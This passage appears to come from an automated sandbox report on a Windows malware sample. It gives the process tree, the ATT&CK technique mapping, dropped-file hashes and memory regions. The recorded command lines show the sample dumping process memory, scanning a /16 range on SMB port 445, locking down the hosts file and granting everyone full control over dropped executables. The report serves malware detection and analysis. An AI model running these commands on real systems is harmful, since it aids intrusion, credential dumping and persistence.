  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3856 C:\Windows\TEMP\lbtermtbs\3856.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3592
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3932 C:\Windows\TEMP\lbtermtbs\3932.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3532
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4016 C:\Windows\TEMP\lbtermtbs\4016.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3136
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3272 C:\Windows\TEMP\lbtermtbs\3272.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4936 C:\Windows\TEMP\lbtermtbs\4936.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\lbtermtbs\etamgyklt\scan.bat
  2⤵
  PID:4572
- - C:\Windows\lbtermtbs\etamgyklt\itfnybsmt.exe
    itfnybsmt.exe TCP 191.101.0.1 191.101.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:4988
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4332 C:\Windows\TEMP\lbtermtbs\4332.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6128
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3008 C:\Windows\TEMP\lbtermtbs\3008.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5132
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4232 C:\Windows\TEMP\lbtermtbs\4232.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6500
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2988 C:\Windows\TEMP\lbtermtbs\2988.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6688
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4572 C:\Windows\TEMP\lbtermtbs\4572.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6728
- C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe
  C:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 1240 C:\Windows\TEMP\lbtermtbs\1240.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:6372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:6200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3684 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
1⤵
PID:1904

C:\Windows\SysWOW64\ogmqgi.exe
C:\Windows\SysWOW64\ogmqgi.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:208

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F
1⤵
PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4428
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F
  2⤵
  PID:3916

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe
1⤵
PID:2244
- C:\Windows\ime\guwlsyl.exe
  C:\Windows\ime\guwlsyl.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:60

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
1⤵
PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4768
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
  2⤵
  PID:1088

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe
1⤵
PID:6752
- C:\Windows\ime\guwlsyl.exe
  C:\Windows\ime\guwlsyl.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6212

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F
1⤵
PID:6884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2148
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F
  2⤵
  PID:4132

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
1⤵
PID:6140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:6152
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F
  2⤵
  PID:5196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\lbtermtbs\1020.dmp

Filesize
33.5MB

MD5
3800518316be06a2d33fb08f88c46a03

SHA1
a4dea2407bbe40badd206c4d6e8696c1520b6cb0

SHA256
2af54004a37d069dcd3242a6f671aa90dc075629dc321b098a62dbe4d1f30e33

SHA512
034a5e01a3ce51c2457ee569b2353341bd274c7895a3012a3df34d9b10ea5648ff460e732a89ef4c448f33704dd43bee9e23073c6656a37f0c91554bfc596544

Download Submit
C:\Windows\TEMP\lbtermtbs\1412.dmp

Filesize
818KB

MD5
06f263437ebb3b9cc11fc9a4a7d14043

SHA1
9f05fdaa6a95aeae73614611bb16b2c05cdd3e52

SHA256
a790a9a5d7ca1b1887287574500eaa3d57e247fb619c376b1e81ea07d934a770

SHA512
e094a095732d15710fcf5334e17f49dc97d2f1610e3c5d7071f8a6bd6249f4d7c1fa5b5d7d341a4a882281d2fb49991b3572bbd57e3e6fd242fc9c1acff1a50c

Download Submit
C:\Windows\TEMP\lbtermtbs\2076.dmp

Filesize
4.2MB

MD5
794748357638bef0a0d3557da20b7fd2

SHA1
60ea70e3ff2b638462ac1876d6f82de56b8d0253

SHA256
976ee46da61e558337d35a79e5c5434344f8ae1cf46f4509abd07696b0e7eee8

SHA512
4d58434399aa448dc2292227e9827932e25250ffe5c26a038ac95dfaff14946ccb05c89394fb56b9908cf0db162cd5e7e940cb0e5540c005fc3587ac41db3634

Download Submit
C:\Windows\TEMP\lbtermtbs\2572.dmp

Filesize
3.5MB

MD5
37ba27eeab33657d29188446322cbc8d

SHA1
4060300ea8848ded6a3e149d9c76af2fa263d920

SHA256
6cbe388e3f95e0cba154ef6e0abda512cfe6f719d8917bcff229edec574f5c10

SHA512
55287c8ca29a6d7d3bdcefb12616da1adc0e4133ccaa339dc54b647df99a2cc4f0842bb1fd13b5946b438d8f086c7175ffbbcba341ebeee7dee4cec3dfe7b1a1

Download Submit
C:\Windows\TEMP\lbtermtbs\2664.dmp

Filesize
7.6MB

MD5
29bb50635b75ee8e2025c0aef81d255c

SHA1
fb419060719761da4e3d2b9f2cf2e7179806c247

SHA256
9d07d6dfdf045fc78d861c9cdf44d276b914b71e7770e6578c125c4bea2da416

SHA512
6549dd2a6a2ec4db0f869edd90b574638dfbe2f6279794a85049cfba1023ed1446087a672fba533586857bd2e0a5b7557a71df3a825f9b03f2ff84258cfdde66

Download Submit
C:\Windows\TEMP\lbtermtbs\2824.dmp

Filesize
2.9MB

MD5
f6d303785f7e94fe0551e71a210c5445

SHA1
37869b8d89be41684224ecccb066c4e4cbba63b6

SHA256
38d4c02965056c471349efd1db78a802e810a28c1f1414c8470f955c459c5b6b

SHA512
a830056fd59d8ec08a1b22d4e1c2602bcd82a7ceb176c79b1065b2734c880370db71162515494466f312170b95526f48ba70c37bd58e38edf5f5ad90cfa94bef

Download Submit
C:\Windows\TEMP\lbtermtbs\3272.dmp

Filesize
26.6MB

MD5
b818760a6286118949f5cdb422d6d34c

SHA1
9a7a6d4fdbebc7a9ab106606754dd054b37c32b4

SHA256
debbb6ab73db9373d1a04af2be01bd9980b7daebee801c126cde8d3bc30cb2eb

SHA512
af137b7b684ca65170d4056094c2074fe6b3d63bb3e060f79378f53622d6bf963c4259fc665ad6acb435ad5a25011be3ab4ce65dc3e628d996f0f327edb5479a

Download Submit
C:\Windows\TEMP\lbtermtbs\3712.dmp

Filesize
2.2MB

MD5
5cf219ff5de14d343c3742e55b826263

SHA1
c0dc90c80bf549fb5e1c7fc80fcddcf9a59cb8b0

SHA256
005d73c0d9e8876d2f07e8be71641c9a851fc5808f8946068e735ecce6f98ea8

SHA512
4cfec09bd572b9c39ccea65656461a4e6e8bac260be7158af45f40c34c01f0a5635549a949d7836747f0dbce4b22fd820e7c90b251a20b126bb17f327c7767a5

Download Submit
C:\Windows\TEMP\lbtermtbs\3856.dmp

Filesize
20.8MB

MD5
8a6cd1b3d340aaa49dc185426ec2d906

SHA1
ade51f2ab6480b9d16c06aee0ead4afc416e1ed9

SHA256
ff3e1f71205590c2d0124b8c41651c661ac3d88f516f9fe9b968c4ae3f7d147d

SHA512
d86698d6a949a29de32bbf2a5f00fcb703c34285ecf9544502219891194b5a8f43f70881d058de2df81583474b8c6af7f976056ecdbea806bb82157132fd0352

Download Submit
C:\Windows\TEMP\lbtermtbs\3932.dmp

Filesize
4.2MB

MD5
b6b39e0fce26dc702bad39574d913ef3

SHA1
d6b2a50892419a0f187ca386b9ce39a332547e46

SHA256
b774a8d854c154b20672f738ce35d799dac66208dc9c2853e2b8a1b1e61260ca

SHA512
84d73466b188edc45f73cc686896061879696080cefc41f019ea9371cf3eee21e350541f7a72b53e68ddcd5a365bb179c8bec488750a1b49f378a242f1267664

Download Submit
C:\Windows\TEMP\lbtermtbs\4016.dmp

Filesize
45.4MB

MD5
3e6b4fbc3f4ea3d616fcdd238b942031

SHA1
83d6fcd2fd5cdd207afc63dba154022730abe55e

SHA256
e2ec68670707145b45b1aeb9693a21984b25d37b0b24d08126b37de814939a27

SHA512
10f1a3ea9b1f57e169aece6fed39eea3c11e85ce58ee3c190a3176ea926002900cc9b2ef9c0d7e071d9d48967eac4c7d61dea7efa2bb6c325aa37a83a5977219

Download Submit
C:\Windows\TEMP\lbtermtbs\4936.dmp

Filesize
1.2MB

MD5
9e239a8bcdc4d4840e265796a6058594

SHA1
b40c1f6227b91b5c8cabc2bc27428392b2e79664

SHA256
aeadf7bc668de65ea567fa7d3db5f31816ca2b889944cceb1b51ab8224556a72

SHA512
b6e3391aeacb5b888119ed2ed33ddbf7ffedcfbd80d6a8be485995a879e797e9389ce43af964410f6f89901ddb9b1a3507d96e66d0174b739697e399a963413d

Download Submit
C:\Windows\TEMP\lbtermtbs\788.dmp

Filesize
2.0MB

MD5
ba8a078c2a356b0912e1ce747abf7757

SHA1
b059c57562d0f9f78a74859fd0a1769f8841e435

SHA256
4841ac5d8c7d71c379225ff0afa02f7faa858e4429c156c79f5ee285554a626f

SHA512
7b07cd47233512b5d862e0f6d126848854e75810abb784a80e74b15e0e25d6bce6114b86a5c086d840d203139305d765ec0de0e0fee01a0f6639a7d7672c6da2

Download Submit
C:\Windows\TEMP\ttltnyvty\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\lbtermtbs\ntaiaautl.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsuC3BA.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsuC3BA.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\ttltnyvty\ibyaef.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\jetgmbly\guwlsyl.exe

Filesize
7.9MB

MD5
e6ef7e85d473f09ee12f95e00d62fcd3

SHA1
4b794c1457aef357cd07666bc03b8ed7192544df

SHA256
6de7e2c8dcbb457226c4e6b576466bc2a435e90679bb2d07cd724862d59ce816

SHA512
7704df596df701e9685ceac82d8a46ef539f8dae8f0aa35c0e78fd5453f252b7f340c94d174fb9cc636e99b82f810e1d614fd5a6804db6ab3f6dae9f9ffb002e

Download Submit
C:\Windows\lbtermtbs\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\lbtermtbs\etamgyklt\ip.txt

Filesize
195B

MD5
163669ce9eadd494daf3020ffd56b385

SHA1
48b4681f3a6ea22f6c2394e2470e6369ee0ac3d8

SHA256
bcf8c43332c376c071eaea7f3ad82ae29d743504185f91a5a7d683faf72206df

SHA512
ceab2ea546b2364d1c300e14d96bb78cef17cfad43c998504e3ed3370f1a2ed73ab6b8d5129f08b8911fbe52003b0d71ee9037a3e155369188bdb3c2a95c60cb

Download Submit
C:\Windows\lbtermtbs\etamgyklt\scan.bat

Filesize
159B

MD5
3debbef08bdd5bebd599690a410dddb5

SHA1
fd60224cb090b6268524644d95c45055cd35604e

SHA256
3350f8b4e88719e99b20b5c52c2a0d655e4fddb67fae2ed5b9bd05c794681dc3

SHA512
d96376967528a5ac1fceb7b6ea0341f1981ec05efdde005ad72d2ecd9a7b6adfdf4957d44da6255c32043a54b5964ad741549b6d8a44500037d19ad35f69a686

Download Submit
C:\Windows\lbtermtbs\etamgyklt\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/416-78-0x0000000001710000-0x000000000175C000-memory.dmp

Filesize
304KB

Download
memory/1404-227-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/1620-192-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/1844-220-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-153-0x000001B1ED8E0000-0x000001B1ED8F0000-memory.dmp

Filesize
64KB

Download
memory/1844-150-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-305-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-189-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-190-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-175-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-255-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-246-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-206-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-241-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1844-216-0x00007FF7B2170000-0x00007FF7B2290000-memory.dmp

Filesize
1.1MB

Download
memory/1900-171-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/2148-186-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/3040-138-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp

Filesize
952KB

Download
memory/3040-135-0x00007FF79CA10000-0x00007FF79CAFE000-memory.dmp

Filesize
952KB

Download
memory/3136-218-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/3320-200-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/3344-223-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/3448-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3532-213-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/3592-204-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/3872-182-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/4228-173-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4228-159-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4364-196-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/4620-146-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/4620-142-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/4796-178-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/4988-240-0x0000000000170000-0x0000000000182000-memory.dmp

Filesize
72KB

Download
memory/5064-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/5064-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/5132-245-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/6128-243-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/6372-257-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/6500-249-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/6688-251-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download
memory/6728-254-0x00007FF7E3D00000-0x00007FF7E3D5B000-memory.dmp

Filesize
364KB

Download